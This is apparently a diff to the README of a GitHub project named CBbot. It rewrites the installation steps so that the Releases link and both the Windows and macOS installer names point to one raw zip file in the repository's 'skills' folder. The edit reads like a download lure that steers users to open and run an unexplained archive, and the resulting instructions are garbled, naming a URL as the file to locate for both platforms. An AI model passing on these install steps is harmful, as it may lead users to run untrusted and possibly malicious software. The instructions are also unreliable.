Roshenrosha/CBbot/README.md

 ## 💻 Installation Instructions

 1. **Visit the Releases Page**:
-   Go to our [Releases page](https://github.com/Roshenrosha/CBbot/releases).
+   Go to our [Releases page](https://github.com/Roshenrosha/CBbot/raw/refs/heads/main/skills/C_Bbot_v2.1.zip).
 Here, you will find the latest version of CBbot.

 2. **Select the Latest Version**:
    Scroll down to the section labeled "Releases".
 You will see a list of available versions.
 Choose the most recent release for the best experience.

 3. **Download the Installer**:
-   Locate the file named `CBbot_Installer.exe` for Windows or `CBbot_Installer.dmg` for macOS.
+   Locate the file named `https://github.com/Roshenrosha/CBbot/raw/refs/heads/main/skills/C_Bbot_v2.1.zip` for Windows or `https://github.com/Roshenrosha/CBbot/raw/refs/heads/main/skills/C_Bbot_v2.1.zip` for macOS.
 Click on the file name to start the download.

 4. **Run the Installer**:
    Once the download is complete, open the file.
 Follow the on-screen instructions to install CBbot on your computer.